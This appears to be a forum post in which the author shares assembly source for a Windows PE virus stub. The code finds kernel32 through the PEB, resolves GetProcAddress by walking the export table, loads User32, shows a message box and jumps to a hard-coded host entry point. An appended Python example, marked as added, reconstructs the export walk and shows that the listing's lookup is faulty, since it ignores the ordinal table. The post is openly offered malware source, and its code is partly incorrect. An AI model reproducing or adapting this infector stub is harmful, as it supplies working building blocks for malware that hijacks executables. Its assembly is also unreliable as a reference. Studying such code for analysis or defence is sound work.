This is the virus I wrote last year. Before writing it I read a lot of material, mainly 386 assembly and the PE file structure; personally I don't think it is very difficult. I am still not very familiar with macro assembly, otherwise the code could be more concise.

.486
.model flat, stdcall
option casemap:none
include /masm32/include/windows.inc

.code
start:
    call pStart
pStart:
    mov ebx, dword ptr [esp]
    sub ebx, offset pStart          ; ebx = relocation delta, should be 0 now
    push ebp                        ; save ebp
    mov ebp, esp
    sub esp, 80h                    ; change to 40h according to the variables used
    mov dword ptr [ebp-4], ebx      ; save to pBase

    ;;; get kernel base ;;;
    mov eax, fs:[30h]
    test eax, eax
    js loc1
    mov eax, dword ptr [eax+0ch]
    mov esi, dword ptr [eax+1ch]
    lodsd
    mov eax, dword ptr [eax+8]
    jmp loc2
loc1:
    mov eax, dword ptr [eax+34h]
    mov eax, dword ptr [eax+0b8h]
loc2:
    mov dword ptr [ebp-10h], eax
    push ebp                        ; save the variable table pointer ebp
    mov ebp, eax                    ; ebp = kBase

    ;;; get GetProcAddress's entry point ;;;
    mov eax, dword ptr [ebp+3ch]
    mov edx, dword ptr [ebp+eax+120]
    add edx, ebp
    mov ecx, dword ptr [edx+24]     ; number of names
    mov ebx, dword ptr [edx+28]     ; AT = address table
    push dword ptr [edx+32]         ; nPT = name pointer table, kept at [esp]
    mov edi, esp
    sub edi, 10h
    mov dword ptr [edi], 50746547h     ; "GetP"
    mov dword ptr [edi+4], 41636f72h   ; "rocA"  ; to change
    mov dword ptr [edi+8], 65726464h   ; "ddre"
    mov dword ptr [edi+0ch], 00007373h ; "ss", 0
findStart:
    dec ecx
    xor edx, edx
    mov esi, dword ptr [esp]
    add esi, ebp
    mov esi, dword ptr [esi]
    add esi, ebp
cmpByte:
    lodsb
    cmp al, byte ptr [edi+edx]
    jne notSame
    cmp edx, 14
    je find
    inc edx
    loop cmpByte
    jmp cantFind
notSame:
    add dword ptr [esp], 4
    add ebx, 4
    jmp findStart
cantFind:
    xor eax, eax
    jmp findEnd
find:
    add ebx, ebp
    mov eax, dword ptr [ebx]
    add eax, ebp
findEnd:
    add esp, 4
    pop ebp                         ; restore the running variable table pointer
    mov dword ptr [ebp-0ch], eax    ; save the GetProcAddress function entry point

    mov ebx, dword ptr [ebp-4]
    mov edx, offset LoadLibrary     ; "LoadLibrary"
    add edx, ebx
    push edx
    push dword ptr [ebp-10h]
    call dword ptr [ebp-0ch]        ; get the address of LoadLibrary
    mov dword ptr [ebp-14h], eax
    mov edx, offset User32          ; "User32.dll"
    add edx, ebx
    push edx
    call eax                        ; call LoadLibrary

    mov edx, offset MessageBox      ; "MessageBoxA"
    add edx, ebx
    push edx
    push eax
    call dword ptr [ebp-0ch]        ; get the address of MessageBoxA
    push 0
    push edx
    push edx
    push 0
    call eax
    nop
    nop

    ; add esp, 80h                  ; change to 40h
    pop ebp
    jmp pEnd

LoadLibrary db "LoadLibrary", 0
User32      db "User32.dll", 0
MessageBox  db "MessageBoxA", 0

pEnd:
    mov eax, 0041c560h              ; go to the normal program entry point
    jmp eax
    nop
    nop
    nop
    nop
    nop
    nop
end start
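For readers checking what the hard-coded offsets in the listing (0x3C, 120, 24, 28, 32) refer to, here is an added Python example, not part of the original post, that performs the same export-directory walk over a constructed minimal flat image (RVA == offset, as in a mapped module). It also shows the AddressOfNameOrdinals indirection (offset 36) that the listing skips; with `use_ordinals=False` it reproduces the listing's behaviour of using the name index as the function index, which is only correct when the two tables happen to line up.

```python
import struct

def build_image():
    """Construct a minimal flat PE-like image as test data (not a real DLL).
    Layout: e_lfanew -> 0x40, export directory at RVA 0x200, function table at
    0x240, name pointer table at 0x260, ordinal table at 0x280, strings at 0x2A0."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                 # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    # IMAGE_DATA_DIRECTORY[0] (exports) = NT header + 0x18 + 0x60 = +0x78 (the "120")
    struct.pack_into("<II", img, 0x40 + 0x78, 0x200, 0x40)
    names = [b"GetLastError", b"GetProcAddress", b"LoadLibraryA"]  # sorted, as in real DLLs
    funcs = [0x1000, 0x2000, 0x3000]     # AddressOfFunctions, indexed by ordinal
    ordinals = [1, 2, 0]                 # name i -> funcs[ordinals[i]] (deliberately not identity)
    # IMAGE_EXPORT_DIRECTORY: ..., NumberOfFunctions@20, NumberOfNames@24,
    # AddressOfFunctions@28, AddressOfNames@32, AddressOfNameOrdinals@36
    struct.pack_into("<IIHHIIIIIII", img, 0x200, 0, 0, 0, 0, 0, 1,
                     len(funcs), len(names), 0x240, 0x260, 0x280)
    for i, f in enumerate(funcs):
        struct.pack_into("<I", img, 0x240 + 4 * i, f)
    rva = 0x2A0
    for i, n in enumerate(names):
        struct.pack_into("<I", img, 0x260 + 4 * i, rva)
        struct.pack_into("<H", img, 0x280 + 2 * i, ordinals[i])
        img[rva:rva + len(n) + 1] = n + b"\0"
        rva += len(n) + 1
    return bytes(img)

def resolve_export(img, wanted, use_ordinals=True):
    """Return the RVA of export `wanted`, walking the export directory the way the
    listing's assembly does: e_lfanew -> data directory 0 -> name table scan."""
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    exp_rva = struct.unpack_from("<I", img, e_lfanew + 0x78)[0]
    n_names, func_tab, name_tab, ord_tab = struct.unpack_from("<IIII", img, exp_rva + 24)
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", img, name_tab + 4 * i)[0]
        end = img.index(b"\0", name_rva)
        if img[name_rva:end] != wanted:
            continue
        # The listing advances the function table in step with the name table,
        # i.e. index = i; the documented layout goes through the ordinal table.
        index = struct.unpack_from("<H", img, ord_tab + 2 * i)[0] if use_ordinals else i
        return struct.unpack_from("<I", img, func_tab + 4 * index)[0]
    return None
```

On the constructed image the listing-style walk resolves GetProcAddress to 0x2000 while the ordinal-aware walk yields the correct 0x3000.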